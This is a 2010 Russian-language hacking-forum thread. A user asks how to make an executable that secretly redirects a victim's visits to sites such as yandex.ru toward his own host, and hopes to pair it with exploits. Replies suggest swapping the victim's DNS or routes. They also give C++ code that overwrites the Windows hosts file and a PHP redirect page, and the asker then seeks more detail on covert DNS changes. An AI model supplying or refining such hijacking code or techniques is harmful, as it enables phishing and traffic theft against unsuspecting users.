Подмена хостов через proxy

Discussion in 'Уязвимости' started by MrAkimov, 5 Nov 2010.

  1. MrAkimov

    MrAkimov Banned

    Joined:
    1 May 2010
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    Очень нужна ваша помощь ачатовцы!!

    Недавече узнал о такой классной вещице как подмена хостов через proxy. Сам до этого времени юзал подмену hosts файла в винде, в вот про прокси не знал. Объясните мне как это работает и как это организовать :rolleyes:

    ( а еще лучше было бы все это сочетать со сплойтами :rolleyes: :rolleyes: :rolleyes: )
     
  2. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Всмысле, ты хочеш юзать прокси сервера ? Если да, то тык : http://www.ehow.com/how_5269500_use-socks-proxy.html
     
  3. MrAkimov

    MrAkimov Banned

    Joined:
    1 May 2010
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    мне надо чтобы юзер скачал некую exe программку(вот ее рецепт и нужно узнать) чтобы потом он зашел например на yandex.ru а его перекинуло на мой хост.

    если короче - то аналог замены hosts но через прокси
     
  4. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    замени у него dns на свой и там уже делай что хочешь
    можешь еще роуты (route add) у него прописать
    возможностей масса...
     
  5. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Все не могу допереть, причём тут прокси ?

    Можно ведь на c++ по бырому накатать что-нють тип
    Code:
    #include "stdafx.h" // у мну VC++ 2010
    #include <iostream>
    #include <fstream>
    
    using namespace std;
    int main()
    {
      ofstream hosts;
      hosts.open ("C:/windows/system32/drivers/etc/hosts");
      hosts << "myhost.com yandex.ru";
      hosts.close();
      return 0;
    }
    Зафигачить где-нють фри хост в поддержкой пхп, и в index.php

    Code:
    <?
    header('Location: http://кудатеперь?/');
    ?>
     
    #5 DeepBlue7, 6 Nov 2010
    Last edited: 6 Nov 2010
  6. MrAkimov

    MrAkimov Banned

    Joined:
    1 May 2010
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5

    да ,я так и делал, но в том проблема ,что 60% юзерофф знает об hosts ( даже если путь к нему в реестре изменить)



    про смену DNS хотелось бы поподробнее
     
Loading...
Similar Threads - Подмена хостов proxy
  1. al80
    Replies:
    4
    Views:
    3,106
  2. FriLL
    Replies:
    2
    Views:
    1,966
  3. sashap88
    Replies:
    4
    Views:
    5,765
  4. amxx
    Replies:
    0
    Views:
    2,762